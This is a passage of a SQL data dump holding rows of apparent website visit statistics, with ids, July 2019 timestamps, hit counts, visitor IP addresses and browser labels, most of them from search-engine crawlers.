0,'40.77.167.146','other'),(434655,1562893979,1,1,0,0,'66.249.69.58','chrome'),(434656,1562894891,1,1,0,0,'54.36.149.74','other'),(434657,1562895165,1,1,0,0,'37.9.113.148','other'),(434658,1562895282,2,2,0,0,'40.77.167.146','other'),(434659,1562895868,1,1,0,0,'66.249.69.62','chrome'),(434660,1562895957,1,1,0,0,'54.36.149.72','other'),(434661,1562895988,1,1,0,0,'54.36.149.71','other'),(434662,1562896132,2,2,0,0,'66.249.69.60','chrome'),(434663,1562896205,2,2,0,0,'207.46.13.36','other'),(434664,1562896212,1,1,0,0,'40.77.167.146','other'),(434665,1562896970,1,1,0,0,'66.249.75.124','chrome'),(434666,1562898004,1,1,0,0,'40.77.167.146','other'),(434667,1562899471,1,1,0,0,'95.108.181.54','other'),(434668,1562900361,1,1,0,0,'3.92.28.84','other'),(434669,1562900418,1,1,0,0,'207.46.13.185','other'),(434670,1562900492,1,1,0,0,'66.249.69.60','chrome'),(434671,1562901056,1,1,0,0,'157.55.39.133','other'),(434672,1562901076,1,1,0,0,'54.36.149.106','other'),(434673,1562901423,1,1,0,0,'40.77.167.146','other'),(434674,1562901463,1,1,0,0,'178.255.215.94','other'),(434675,1562901509,1,1,0,0,'54.36.149.72','other'),(434676,1562901588,1,1,0,0,'40.77.167.115','other'),(434677,1562901798,1,1,0,0,'93.119.227.34','other'),(434678,1562901799,1,1,0,0,'93.119.227.34','chrome'),(434679,1562902031,1,1,0,0,'207.46.13.36','other'),(434680,1562903199,1,1,0,0,'178.93.148.191','chrome'),(434681,1562903287,1,1,0,0,'54.36.149.35','other'),(434682,1562903292,1,1,0,0,'207.46.13.36','other'),(434683,1562903371,1,1,0,0,'207.46.13.139','other'),(434684,1562903522,1,1,0,0,'54.36.149.51','other'),(434685,1562903542,1,1,0,0,'66.249.69.60','chrome'),(434686,1562904014,1,1,0,0,'8.29.198.27','other'),(434687,1562904474,1,1,0,0,'157.55.39.9','other'),(434688,1562904645,1,1,0,0,'8.29.198.26','other'),(434689,1562905567,2,1,1,0,'66.249.69.58',''),(434690,1562906095,1,1,0,0,'207.46.13.115','other'),(434691,1562906245,1,1,0,0,'54.36.149.10','other'),(434692,1562907391,1,1,0,0,'66.249.69.62','chrome'),(434693,1562908702,1,1,0,0,'207.46.13.139','other'),(434694,1562908709,1,1,0,0,'207.46.13.115','other'),(434695,1562908850,1,1,0,0,'91.196.178.169','chrome'),(434696,1562908959,1,1,0,0,'37.9.113.103','other'),(434697,1562909616,1,1,0,0,'66.249.69.60','chrome'),(434698,1562909955,1,1,0,0,'178.17.166.150','other'),(434699,1562910058,1,1,0,0,'178.219.85.79','chrome'),(434700,1562911363,1,1,0,0,'54.36.149.52','other'),(434701,1562911397,1,1,0,0,'54.36.149.59','other'),(434702,1562911411,1,1,0,0,'54.36.149.42','other'),(434703,1562911417,1,1,0,0,'207.46.13.139','other'),(434704,1562912027,2,2,0,0,'91.196.178.92','chrome'),(434705,1562912357,1,1,0,0,'54.36.149.52','other'),(434706,1562912631,3,3,0,0,'66.249.69.62','chrome'),(434707,1562912940,1,1,0,0,'54.36.149.95','other'),(434708,1562913090,1,1,0,0,'91.196.178.92','chrome'),(434709,1562913158,2,2,0,0,'91.209.11.236','other'),(434710,1562913251,1,1,0,0,'207.46.13.115','other'),(434711,1562913279,1,1,0,0,'91.196.178.183','chrome'),(434712,1562913473,1,1,0,0,'157.55.39.9','other'),(434713,1562914875,1,1,0,0,'8.29.198.25','other'),(434714,1562914917,1,1,0,0,'91.196.178.92','chrome'),(434715,1562915251,1,1,0,0,'95.108.213.4','other'),(434716,1562915268,1,1,0,0,'130.180.217.34','chrome'),(434717,1562915582,1,1,0,0,'8.29.198.27','other'),(434718,1562916298,1,1,0,0,'66.249.75.124','chrome'),(434719,1562917226,2,2,0,0,'207.46.13.139','other'),(434720,1562917249,1,1,0,0,'91.196.178.92','chrome'),(434721,1562917681,1,1,0,0,'176.9.9.94','other'),(434722,1562917943,1,1,0,0,'66.249.69.62','chrome'),(434723,1562918525,1,1,0,0,'207.46.13.139','other'),(434724,1562918980,1,1,0,0,'91.196.178.24','chrome'),(434725,1562919294,1,1,0,0,'66.249.69.58','chrome'),(434726,1562919640,1,1,0,0,'91.195.156.124','firefox'),(434727,1562919894,1,1,0,0,'54.36.149.85','other'),(434728,1562920662,1,1,0,0,'54.36.149.30','other'),(434729,1562920697,2,2,0,0,'157.55.39.9','other'),(434730,1562921082,4,4,0,0,'157.55.39.213','other'),(434731,1562921093,5,5,0,0,'207.46.13.139','other'),(434732,1562921098,2,2,0,0,'207.46.13.144','other'),(434733,1562922124,2,2,0,0,'66.249.69.60','chrome'),(434734,1562923016,1,1,0,0,'94.179.147.128','chrome'),(434735,1562923635,1,1,0,0,'54.36.149.54','other'),(434736,1562925605,1,1,0,0,'157.55.39.9','other'),(434737,1562925733,1,1,0,0,'8.29.198.25','other'),(434738,1562925933,1,1,0,0,'91.196.178.87','firefox'),(434739,1562925968,1,1,0,0,'54.36.149.13','other'),(434740,1562925981,1,1,0,0,'54.36.149.1','other'),(434741,1562926246,1,1,0,0,'91.196.178.101','chrome'),(434742,1562926500,1,1,0,0,'8.29.198.27','other'),(434743,1562926628,1,1,0,0,'213.180.203.17','other'),(434744,1562926883,1,1,0,0,'66.249.69.60','chrome'),(434745,1562927132,1,1,0,0,'109.74.154.72','chrome'),(434746,1562927713,1,1,0,0,'178.154.244.49','other'),(434747,1562927727,1,1,0,0,'91.196.178.129','firefox'),(434748,1562928000,2,2,0,0,'66.249.69.62','chrome'),(434749,1562928352,1,1,0,0,'54.36.149.51','other'),(434750,1562928640,1,1,0,0,'66.249.75.124','chrome'),(434751,1562928916,1,1,0,0,'207.46.13.139','other'),(434752,1562929154,1,1,0,0,'207.46.13.208','other'),(434753,1562929286,1,1,0,0,'54.36.149.73','other'),(434754,1562929668,1,1,0,0,'157.55.39.213','other'),(434755,1562929771,1,1,0,0,'66.249.69.62','chrome'),(434756,1562929978,1,1,0,0,'54.36.149.33','other'),(434757,1562930113,1,1,0,0,'54.36.149.24','other'),(434758,1562930192,2,2,0,0,'157.55.39.81','other'),(434759,1562930227,1,1,0,0,'54.36.149.105','other'),(434760,1562930323,1,1,0,0,'207.46.13.208','other'),(434761,1562930620,1,1,0,0,'54.36.149.101','other'),(434762,1562931442,1,1,0,0,'207.46.13.130','other'),(434763,1562931518,1,1,0,0,'54.36.149.87','other'),(434764,1562931652,2,2,0,0,'66.249.69.60','chrome'),(434765,1562931665,1,1,0,0,'207.46.13.208','other'),(434766,1562931929,1,1,0,0,'157.55.39.81','other'),(434767,1562932849,1,1,0,0,'54.36.149.69','other'),(434768,1562933126,1,1,0,0,'54.36.149.90','other'),(434769,1562933422,1,1,0,0,'207.46.13.208','other'),(434770,1562934347,1,1,0,0,'91.196.178.170','chrome'),(434771,1562934678,2,2,0,0,'207.46.13.208','other'),(434772,1562934906,1,1,0,0,'66.249.69.62','chrome'),(434773,1562934917,1,1,0,0,'91.196.177.46','firefox'),(434774,1562935810,6,6,0,0,'176.9.9.94','other'),(434775,1562936085,1,1,0,0,'95.84.240.119','msie'),(434776,1562936102,1,1,0,0,'54.36.149.20','other'),(434777,1562936441,2,2,0,0,'66.249.69.60','chrome'),(434778,1562936604,1,1,0,0,'8.29.198.25','other'),(434779,1562936621,1,1,0,0,'207.46.13.208','other'),(434780,1562936809,1,1,0,0,'54.36.149.28','other'),(434781,1562936920,1,1,0,0,'157.55.39.181','other'),(434782,1562936988,1,1,0,0,'54.36.149.22','other'),(434783,1562937026,1,1,0,0,'157.55.39.56','other'),(434784,1562937355,1,1,0,0,'66.249.69.60','chrome'),(434785,1562937431,1,1,0,0,'8.29.198.26','other'),(434786,1562938296,2,2,0,0,'157.55.39.56','other'),(434787,1562938301,1,1,0,0,'54.36.149.5','other'),(434788,1562938424,1,1,0,0,'66.249.69.62','chrome'),(434789,1562938825,1,1,0,0,'207.46.13.208','other'),(434790,1562939091,1,1,0,0,'141.8.142.108','other'),(434791,1562939221,1,1,0,0,'54.36.149.31','other'),(434792,1562939468,1,1,0,0,'91.196.178.85','chrome'),(434793,1562940138,1,1,0,0,'46.211.102.192','chrome'),(434794,1562940770,1,1,0,0,'207.46.13.208','other'),(434795,1562940988,1,1,0,0,'92.116.221.87','firefox'),(434796,1562941810,3,3,0,0,'66.249.69.58','chrome'),(434797,1562942048,1,1,0,0,'66.249.69.62','chrome'),(434798,1562942310,2,2,0,0,'40.77.167.177','other'),(434799,1562942371,1,1,0,0,'91.196.178.97','chrome'),(434800,1562942657,1,1,0,0,'54.36.149.59','other'),(434801,1562942759,1,1,0,0,'66.249.69.58','chrome'),(434802,1562942760,1,1,0,0,'66.249.69.60','chrome'),(434803,1562942930,1,1,0,0,'157.55.39.56','other'),(434804,1562942977,1,1,0,0,'66.249.75.126','chrome'),(434805,1562943580,2,2,0,0,'207.46.13.208','other'),(434806,1562944224,1,1,0,0,'54.36.149.107','other'),(434807,1562944484,1,1,0,0,'40.77.167.177','other'),(434808,1562944947,1,1,0,0,'54.36.149.60','other'),(434809,1562945157,1,1,0,0,'157.55.39.181','other'),(434810,1562945775,1,1,0,0,'95.108.181.75','other'),(434811,1562945786,1,1,0,0,'66.249.69.62','chrome'),(434812,1562946286,1,1,0,0,'40.77.167.177','other'),(434813,1562946288,1,1,0,0,'54.36.149.49','other'),(434814,1562946786,1,1,0,0,'66.249.69.58','chrome'),(434815,1562946890,1,1,0,0,'37.248.209.26','chrome'),(434816,1562947092,1,1,0,0,'54.36.149.23','other'),(434817,1562947332,1,1,0,0,'66.249.69.62','chrome'),(434818,1562947468,1,1,0,0,'8.29.198.26','other'),(434819,1562948086,3,3,0,0,'157.55.39.56','other'),(434820,1562948375,1,1,0,0,'8.29.198.26','other'),(434821,1562948981,1,1,0,0,'141.8.142.38','other'),(434822,1562950078,1,1,0,0,'54.36.149.64','other'),(434823,1562950607,1,1,0,0,'207.46.13.208','other'),(434824,1562951470,1,1,0,0,'213.180.203.9','other'),(434825,1562951498,1,1,0,0,'40.77.167.177','other'),(434826,1562951659,1,1,0,0,'66.249.75.126','chrome'),(434827,1562952023,1,1,0,0,'66.249.69.58','chrome'),(434828,1562952050,8,8,0,0,'176.9.9.94','other'),(434829,1562952408,2,2,0,0,'40.77.167.74','other'),(434830,1562952952,6,6,0,0,'176.9.9.94','other'),(434831,1562954000,1,1,0,0,'66.249.69.62','chrome'),(434832,1562954176,1,1,0,0,'66.249.69.58','chrome'),(434833,1562954728,3,3,0,0,'92.113.174.211','other'),(434834,1562954737,1,1,0,0,'95.108.181.83','other'),(434835,1562954997,1,1,0,0,'40.77.167.146','other'),(434836,1562955814,1,1,0,0,'207.46.13.75','other'),(434837,1562956084,1,1,0,0,'95.108.181.83','other'),(434838,1562956238,1,1,0,0,'40.77.167.153','other'),(434839,1562956766,1,1,0,0,'40.77.167.21','other'),(434840,1562957347,1,1,0,0,'40.77.167.146','other'),(434841,1562958223,1,1,0,0,'40.77.167.153','other'),(434842,1562958305,2,2,0,0,'40.77.167.132','other'),(434843,1562958336,1,1,0,0,'8.29.198.25','other'),(434844,1562958695,1,1,0,0,'178.137.80.111','chrome'),(434845,1562958770,1,1,0,0,'95.108.213.4','other'),(434846,1562959042,1,1,0,0,'5.45.207.76','other'),(434847,1562959279,1,1,0,0,'8.29.198.25','other'),(434848,1562959331,1,1,0,0,'66.249.69.58','chrome'),(434849,1562960108,1,1,0,0,'66.249.69.60','chrome'),(434850,1562960434,1,1,0,0,'54.212.215.73','chrome'),(434851,1562960993,1,1,0,0,'40.77.167.153','other'),(434852,1562961076,1,1,0,0,'178.140.104.173','msie'),(434853,1562961964,1,1,0,0,'40.77.167.153','other'),(434854,1562963259,1,1,0,0,'87.250.224.99','other'),(434855,1562963964,6,6,0,0,'66.249.69.58','chrome'),(434856,1562964646,1,1,0,0,'40.77.167.47','other'),(434857,1562965475,1,1,0,0,'5.255.253.38','other'),(434858,1562966226,1,1,0,0,'87.250.224.118','other'),(434859,1562966332,1,1,0,0,'40.77.167.132','other'),(434860,1562966429,1,1,0,0,'66.249.69.60','chrome'),(434861,1562966572,1,1,0,0,'66.249.69.58','chrome'),(434862,1562966998,1,1,0,0,'40.77.167.47','other'),(434863,1562967113,1,1,0,0,'207.46.13.27','other'),(434864,1562967246,1,1,0,0,'157.55.39.243','other'),(434865,1562967960,8,8,0,0,'176.9.9.94','other'),(434867,1562968231,1,1,0,0,'66.249.69.60','chrome'),(434868,1562968663,1,1,0,0,'141.8.142.65','other'),(434869,1562968750,2,2,0,0,'40.77.167.132','other'),(434870,1562968861,6,6,0,0,'176.9.9.94','other'),(434871,1562969183,1,1,0,0,'8.29.198.27','other'),(434872,1562970160,1,1,0,0,'8.29.198.27','other'),(434873,1562970251,2,2,0,0,'66.249.69.62','chrome'),(434874,1562970892,1,1,0,0,'66.249.69.60','chrome'),(434875,1562971752,1,1,0,0,'39.104.51.96','other'),(434876,1562971967,1,1,0,0,'66.249.69.58','chrome'),(434877,1562972030,1,1,0,0,'66.249.69.62','chrome'),(434878,1562973095,1,1,0,0,'207.46.13.151','other'),(434879,1562973223,1,1,0,0,'40.77.167.47','other'),(434880,1562973700,1,1,0,0,'141.8.142.108','other'),(434881,1562974892,1,1,0,0,'66.249.69.60','chrome'),(434882,1562975405,1,1,0,0,'66.249.75.126','chrome'),(434883,1562975759,1,1,0,0,'37.9.113.148','other'),(434884,1562976109,1,1,0,0,'207.46.13.151','other'),(434885,1562976954,1,1,0,0,'66.249.69.58','chrome'),(434886,1562977336,1,1,0,0,'157.55.39.61','other'),(434887,1562977790,1,1,0,0,'69.12.72.162','chrome'),(434888,1562979835,1,1,0,0,'66.249.69.62','chrome'),(434889,1562980032,1,1,0,0,'8.29.198.27','other'),(434890,1562980308,1,1,0,0,'66.249.75.126','chrome'),(434891,1562980747,1,1,0,0,'207.46.13.151','other'),(434892,1562981025,1,1,0,0,'8.29.198.27','other'),(434893,1562981404,2,2,0,0,'176.9.9.94','other'),(434894,1562981425,1,1,0,0,'40.77.167.171','other'),(434895,1562982232,1,1,0,0,'157.55.39.61','other'),(434896,1562982886,1,1,0,0,'207.46.13.151','other'),(434897,1562983529,2,2,0,0,'66.249.69.60','chrome'),(434898,1562984759,1,1,0,0,'157.55.39.61','other'),(434899,1562984881,1,1,0,0,'207.46.13.45','other'),(434900,1562985356,2,2,0,0,'66.249.69.58','chrome'),(434901,1562986176,1,1,0,0,'40.77.167.171','other'),(434902,1562986998,1,1,0,0,'207.46.13.159','other'),(434903,1562987323,1,1,0,0,'157.55.39.61','other'),(434904,1562988059,2,2,0,0,'66.249.69.62','chrome'),(434905,1562988104,1,1,0,0,'157.55.39.219','other'),(434906,1562989098,1,1,0,0,'157.55.39.219','other'),(434907,1562989822,1,1,0,0,'95.108.213.50','other'),(434908,1562990882,1,1,0,0,'8.29.198.26','other'),(434909,1562991124,2,2,0,0,'40.77.167.124','other'),(434910,1562991901,1,1,0,0,'8.29.198.26','other'),(434911,1562992220,1,1,0,0,'40.77.167.171','other'),(434912,1562992361,2,2,0,0,'66.249.69.60','chrome'),(434913,1562992861,1,1,0,0,'207.46.13.74','other'),(434914,1562992946,1,1,0,0,'176.9.9.94','other'),(434915,1562993158,1,1,0,0,'157.55.39.61','other'),(434916,1562993859,1,1,0,0,'40.77.167.124','other'),(434917,1562993876,2,2,0,0,'66.249.69.60','chrome'),(434918,1562994824,1,1,0,0,'157.55.39.61','other'),(434919,1562995743,1,1,0,0,'207.46.13.74','other'),(434920,1562996080,1,1,0,0,'185.220.101.32','other'),(434921,1562997721,1,1,0,0,'95.108.181.83','other'),(434922,1562999041,2,2,0,0,'66.249.69.58','chrome'),(434923,1562999391,1,1,0,0,'40.77.167.124','other'),(434924,1563000427,2,2,0,0,'66.249.69.60','chrome'),(434925,1563001732,1,1,0,0,'8.29.198.27','other'),(434926,1563001950,1,1,0,0,'66.249.75.122','chrome'),(434927,1563002445,1,1,0,0,'40.77.167.124','other'),(434928,1563002450,1,1,0,0,'157.55.39.202','other'),(434929,1563002455,1,1,0,0,'207.46.13.74','other'),(434930,1563002761,1,1,0,0,'8.29.198.26','other'),(434931,1563004039,1,1,0,0,'157.55.39.202','other'),(434932,1563004580,2,2,0,0,'176.9.9.94','other'),(434933,1563004894,1,1,0,0,'87.250.224.118','other'),(434934,1563005066,1,1,0,0,'87.250.224.99','other'),(434935,1563005146,1,1,0,0,'141.8.142.81','other'),(434936,1563005234,1,1,0,0,'66.249.69.58','chrome'),(434937,1563005332,1,1,0,0,'37.9.113.38','other'),(434938,1563006619,1,1,0,0,'93.158.166.7','other'),(434939,1563006714,1,1,0,0,'87.250.224.99','other'),(434940,1563006871,1,1,0,0,'178.154.171.30','other'),(434941,1563006948,1,1,0,0,'178.154.171.17','other'),(434942,1563006951,1,1,0,0,'87.250.224.64','other'),(434943,1563008900,1,1,0,0,'91.196.178.134','other'),(434944,1563009804,1,1,0,0,'141.8.188.11','other'),(434945,1563010272,2,2,0,0,'66.249.69.60','chrome'),(434946,1563010444,1,1,0,0,'40.77.167.109','other'),(434947,1563010873,1,1,0,0,'66.249.69.62','chrome'),(434948,1563010895,1,1,0,0,'40.77.167.105','other'),(434949,1563012134,1,1,0,0,'109.74.154.72','chrome'),(434950,1563012171,2,2,0,0,'141.8.188.29','other'),(434951,1563012405,1,1,0,0,'66.249.69.60','chrome'),(434952,1563012585,1,1,0,0,'8.29.198.27','other'),(434953,1563013287,1,1,0,0,'157.55.39.156','other'),(434954,1563013359,1,1,0,0,'66.249.75.122','chrome'),(434955,1563013610,1,1,0,0,'8.29.198.25','other'),(434956,1563014394,1,1,0,0,'207.46.13.160','other'),(434957,1563014951,1,1,0,0,'141.8.188.29','other'),(434958,1563015110,1,1,0,0,'66.249.75.122','chrome'),(434959,1563015706,1,1,0,0,'141.8.188.11','other'),(434960,1563016091,1,1,0,0,'66.249.69.62','chrome'),(434961,1563016139,1,1,0,0,'176.9.9.94','other'),(434962,1563016281,1,0,1,0,'66.249.69.60',''),(434963,1563016283,1,1,0,0,'51.68.152.26','chrome'),(434964,1563016292,1,1,0,0,'66.249.69.58','chrome'),(434965,1563016776,1,1,0,0,'66.249.69.60','chrome'),(434966,1563017369,1,1,0,0,'5.45.207.79','other'),(434967,1563017906,1,1,0,0,'207.46.13.160','other'),(434968,1563018399,1,1,0,0,'207.46.13.41','other'),(434969,1563020457,1,1,0,0,'66.249.69.58','chrome'),(434970,1563020688,1,1,0,0,'66.249.75.122','chrome'),(434971,1563021060,1,1,0,0,'141.8.188.11','other'),(434972,1563021075,1,1,0,0,'66.249.69.62','chrome'),(434973,1563022753,2,2,0,0,'207.46.13.41','other'),(434974,1563023304,1,1,0,0,'157.55.39.156','other'),(434975,1563023432,1,1,0,0,'8.29.198.25','other'),(434976,1563023832,1,1,0,0,'141.8.188.29','other'),(434977,1563024468,1,1,0,0,'8.29.198.26','other'),(434978,1563024553,1,1,0,0,'13.66.139.0','other'),(434979,1563024739,1,1,0,0,'157.55.39.156','other'),(434980,1563025023,1,1,0,0,'141.8.188.29','other'),(434981,1563025983,1,1,0,0,'157.55.39.156','other'),(434982,1563026708,1,1,0,0,'141.8.188.29','other'),(434983,1563027711,1,1,0,0,'157.55.39.138','other'),(434984,1563027929,1,1,0,0,'176.9.9.94','other'),(434985,1563028647,1,1,0,0,'207.46.13.160','other'),(434986,1563028774,1,1,0,0,'66.249.75.122','chrome'),(434987,1563029247,2,2,0,0,'207.46.13.218','other'),(434988,1563029377,1,1,0,0,'207.46.13.204','other'),(434989,1563030655,1,1,0,0,'60.191.38.77','firefox'),(434990,1563030831,1,1,0,0,'141.8.188.29','other'),(434991,1563031294,1,1,0,0,'66.249.75.126','chrome'),(434992,1563032006,1,1,0,0,'207.46.13.111','other'),(434993,1563033609,1,1,0,0,'207.46.13.160','other'),(434994,1563034016,1,1,0,0,'207.46.13.204','other'),(434995,1563034118,1,1,0,0,'141.8.188.29','other'),(434996,1563034284,1,1,0,0,'8.29.198.25','other'),(434997,1563034549,1,1,0,0,'157.55.39.103','other'),(434998,1563035113,1,1,0,0,'130.180.209.206','chrome'),(434999,1563035349,1,1,0,0,'8.29.198.26','other'),(435000,1563035402,1,1,0,0,'157.55.39.105','other'),(435001,1563035407,2,2,0,0,'207.46.13.218','other'),(435002,1563036457,1,1,0,0,'180.76.15.20','other'),(435003,1563036511,1,1,0,0,'66.249.69.58','chrome'),(435004,1563036621,1,1,0,0,'207.46.13.218','other'),(435005,1563038457,1,1,0,0,'180.76.15.145','other'),(435006,1563038512,1,1,0,0,'46.211.133.200','chrome'),(435007,1563039117,1,1,0,0,'66.249.69.58','chrome'),(435008,1563039150,1,1,0,0,'176.9.9.94','other'),(435009,1563039181,1,1,0,0,'157.55.39.105','other'),(435010,1563039269,1,1,0,0,'141.8.188.29','other'),(435011,1563039451,1,1,0,0,'66.249.75.122','chrome'),(435012,1563040294,1,1,0,0,'78.31.71.37','chrome'),(435013,1563040499,1,1,0,0,'207.46.13.204','other'),(435014,1563041223,1,1,0,0,'66.249.75.124','chrome'),(435015,1563041365,1,1,0,0,'66.249.69.58','chrome'),(435016,1563041901,1,1,0,0,'141.8.188.29','other'),(435017,1563042374,1,1,0,0,'66.249.75.124','chrome'),(435018,1563042582,1,1,0,0,'157.55.39.105','other'),(435019,1563043247,1,1,0,0,'66.249.69.62','chrome'),(435020,1563043334,1,1,0,0,'46.211.72.149','chrome'),(435021,1563043756,1,1,0,0,'141.8.188.29','other'),(435022,1563044759,1,1,0,0,'141.8.188.11','other'),(435023,1563044776,2,2,0,0,'207.46.13.218','other'),(435024,1563044818,1,1,0,0,'91.196.178.91','chrome'),(435025,1563045140,1,1,0,0,'8.29.198.27','other'),(435026,1563045178,1,1,0,0,'157.55.39.128','other'),(435027,1563046213,2,2,0,0,'141.8.188.29','other'),(435028,1563046215,1,1,0,0,'8.29.198.26','other'),(435029,1563046217,1,1,0,0,'157.55.39.133','other'),(435030,1563046321,21,21,0,0,'176.9.28.16','other'),(435031,1563046531,2,2,0,0,'88.198.69.233','other'),(435032,1563046773,1,1,0,0,'157.55.39.128','other'),(435033,1563046955,1,1,0,0,'207.46.13.218','other'),(435034,1563047015,1,1,0,0,'157.55.39.105','other'),(435035,1563047237,19,19,0,0,'176.9.28.16','other'),(435036,1563047958,1,1,0,0,'54.36.99.218','firefox'),(435037,1563048128,1,1,0,0,'66.249.69.60','chrome'),(435038,1563048143,29,29,0,0,'176.9.28.16','other'),(435039,1563049065,31,31,0,0,'176.9.28.16','other'),(435040,1563049090,1,1,0,0,'157.55.39.105','other'),(435041,1563049703,1,1,0,0,'207.46.13.218','other'),(435042,1563049967,39,39,0,0,'176.9.28.16','other'),(435043,1563050142,1,1,0,0,'141.8.188.29','other'),(435044,1563050814,1,1,0,0,'176.9.9.94','other'),(435045,1563050868,31,31,0,0,'176.9.28.16','other'),(435046,1563051128,1,1,0,0,'207.46.13.218','other'),(435047,1563051194,3,3,0,0,'157.55.39.128','other'),(435048,1563051595,3,3,0,0,'157.55.39.78','other'),(435049,1563051604,1,1,0,0,'157.55.39.105','other'),(435050,1563051796,37,37,0,0,'176.9.28.16','other'),(435051,1563051827,1,1,0,0,'207.46.13.85','other'),(435052,1563052340,1,1,0,0,'66.249.69.62','chrome'),(435053,1563052721,32,32,0,0,'176.9.28.16','other'),(435054,1563053320,1,1,0,0,'141.8.188.11','other'),(435055,1563053525,1,1,0,0,'157.55.39.128','other'),(435056,1563053636,5,5,0,0,'176.9.28.16','other'),(435057,1563053975,1,1,0,0,'66.249.69.58','chrome'),(435058,1563054431,1,1,0,0,'66.249.69.62','chrome'),(435059,1563054644,1,1,0,0,'157.55.39.128','other'),(435060,1563055462,1,1,0,0,'93.80.129.106','msie'),(435061,1563055729,1,1,0,0,'157.55.39.128','other'),(435062,1563055983,1,1,0,0,'8.29.198.25','other'),(435063,1563056369,1,1,0,0,'66.249.75.122','chrome'),(435064,1563056587,1,0,1,0,'66.249.69.62',''),(435065,1563056619,1,1,0,0,'141.8.188.29','other'),(435066,1563057087,1,1,0,0,'8.29.198.27','other'),(435067,1563057162,1,1,0,0,'66.249.69.62','chrome'),(435068,1563057391,1,1,0,0,'40.77.167.61','other'),(435069,1563057405,1,1,0,0,'13.66.139.0','other'),(435070,1563058832,1,1,0,0,'141.8.188.29','other'),(435071,1563059086,2,2,0,0,'13.66.139.0','other'),(435072,1563059402,1,1,0,0,'40.77.167.61','other'),(435073,1563060275,1,1,0,0,'66.249.69.58','chrome'),(435074,1563060944,1,1,0,0,'66.249.69.62','chrome'),(435075,1563061754,2,2,0,0,'66.249.75.124','chrome'),(435076,1563061937,1,1,0,0,'40.77.167.82','other'),(435077,1563062080,1,1,0,0,'66.249.75.122','chrome'),(435078,1563062176,4,4,0,0,'66.249.69.60','chrome'),(435079,1563062217,2,2,0,0,'66.249.69.58','chrome'),(435080,1563063082,2,2,0,0,'176.9.9.94','other'),(435081,1563063110,2,2,0,0,'157.55.39.128','other'),(435082,1563063121,1,1,0,0,'207.46.13.85','other'),(435083,1563064412,2,2,0,0,'141.8.188.29','other'),(435084,1563064502,1,1,0,0,'66.249.75.126','chrome'),(435085,1563064573,2,2,0,0,'66.249.69.58','chrome'),(435086,1563064648,1,1,0,0,'66.249.75.124','chrome'),(435087,1563066842,1,1,0,0,'8.29.198.26','other'),(435088,1563067961,1,1,0,0,'8.29.198.25','other'),(435089,1563068381,1,1,0,0,'66.249.69.62','chrome'),(435090,1563068596,1,1,0,0,'207.46.13.85','other'),(435091,1563068806,1,1,0,0,'157.55.39.128','other'),(435092,1563069298,3,3,0,0,'66.249.69.58','chrome'),(435093,1563069565,2,2,0,0,'66.249.69.62','chrome'),(435094,1563069572,2,2,0,0,'66.249.69.60','chrome'),(435095,1563069961,1,1,0,0,'207.46.13.56','other'),(435096,1563069972,1,1,0,0,'207.46.13.85','other'),(435097,1563070930,2,2,0,0,'141.8.188.29','other'),(435098,1563071043,1,1,0,0,'207.46.13.85','other'),(435099,1563071624,1,1,0,0,'66.249.75.126','chrome'),(435100,1563071650,3,3,0,0,'66.249.69.58','chrome'),(435101,1563071667,2,2,0,0,'66.249.69.60','chrome'),(435102,1563071877,2,2,0,0,'207.46.13.56','other'),(435103,1563072186,3,3,0,0,'207.46.13.85','other'),(435104,1563072631,1,1,0,0,'157.55.39.115','other'),(435105,1563073337,1,1,0,0,'207.46.13.56','other'),(435106,1563074530,1,1,0,0,'207.46.13.56','other'),(435107,1563075293,1,1,0,0,'40.77.167.82','other'),(435108,1563076237,1,1,0,0,'207.46.13.56','other'),(435109,1563076784,1,1,0,0,'157.55.39.208','other'),(435110,1563076955,1,1,0,0,'66.249.69.62','chrome'),(435111,1563076981,1,1,0,0,'66.249.75.126','chrome'),(435112,1563077696,1,1,0,0,'8.29.198.27','other'),(435113,1563078239,1,1,0,0,'66.249.69.62','chrome'),(435114,1563078251,2,2,0,0,'66.249.69.60','chrome'),(435115,1563078254,2,2,0,0,'66.249.69.58','chrome'),(435116,1563078520,2,2,0,0,'157.55.39.208','other'),(435117,1563078802,1,1,0,0,'141.8.188.29','other'),(435118,1563078813,1,1,0,0,'8.29.198.26','other'),(435119,1563079405,1,1,0,0,'66.249.69.58','chrome'),(435120,1563080235,1,1,0,0,'157.55.39.109','other'),(435121,1563080334,3,3,0,0,'157.55.39.102','other'),(435122,1563081089,5,5,0,0,'207.46.13.56','other'),(435123,1563081098,1,1,0,0,'157.55.39.208','other'),(435124,1563081176,1,1,0,0,'66.249.69.58','chrome'),(435125,1563081554,333,333,0,0,'185.6.8.3','other'),(435126,1563082457,329,329,0,0,'185.6.8.3','other'),(435127,1563082595,1,1,0,0,'157.55.39.109','other'),(435128,1563082728,3,3,0,0,'157.55.39.102','other'),(435129,1563083359,320,320,0,0,'185.6.8.3','other'),(435130,1563084289,1,1,0,0,'207.46.13.56','other'),(435131,1563084367,1,1,0,0,'66.249.75.126','chrome'),(435132,1563085478,2,2,0,0,'66.249.69.60','chrome'),(435133,1563085994,1,1,0,0,'207.46.13.56','other'),(435134,1563086287,1,1,0,0,'176.9.9.94','other'),(435135,1563087601,1,1,0,0,'157.55.39.208','other'),(435136,1563087664,1,1,0,0,'46.211.133.228','chrome'),(435137,1563087900,1,1,0,0,'66.249.75.122','chrome'),(435138,1563088550,1,1,0,0,'8.29.198.27','other'),(435139,1563089101,2,2,0,0,'157.55.39.208','other'),(435140,1563089110,1,1,0,0,'157.55.39.114','other'),(435141,1563089116,2,2,0,0,'207.46.13.56','other'),(435142,1563089523,1,1,0,0,'141.8.188.11','other'),(435143,1563089689,1,1,0,0,'8.29.198.25','other'),(435144,1563089849,1,1,0,0,'157.55.39.134','other'),(435145,1563089874,1,1,0,0,'141.8.188.29','other'),(435146,1563090588,1,1,0,0,'66.249.69.62','chrome'),(435147,1563091646,1,1,0,0,'207.46.13.56','other'),(435148,1563091831,1,1,0,0,'91.196.178.174','chrome'),(435149,1563093130,1,1,0,0,'66.249.75.124','chrome'),(435150,1563093372,1,1,0,0,'66.249.69.62','chrome'),(435151,1563093387,2,2,0,0,'66.249.69.58','chrome'),(435152,1563093410,1,1,0,0,'141.8.188.11','other'),(435153,1563094645,1,1,0,0,'40.77.167.150','other'),(435154,1563094772,3,3,0,0,'66.249.69.60','chrome'),(435155,1563094835,1,1,0,0,'157.55.39.145','other'),(435156,1563094922,2,2,0,0,'66.249.75.126','chrome'),(435157,1563094992,6,6,0,0,'66.249.69.58','chrome'),(435158,1563096153,1,1,0,0,'141.8.188.11','other'),(435159,1563097441,1,1,0,0,'207.46.13.56','other'),(435160,1563097625,1,1,0,0,'40.77.167.150','other'),(435161,1563097825,2,2,0,0,'157.55.39.145','other'),(435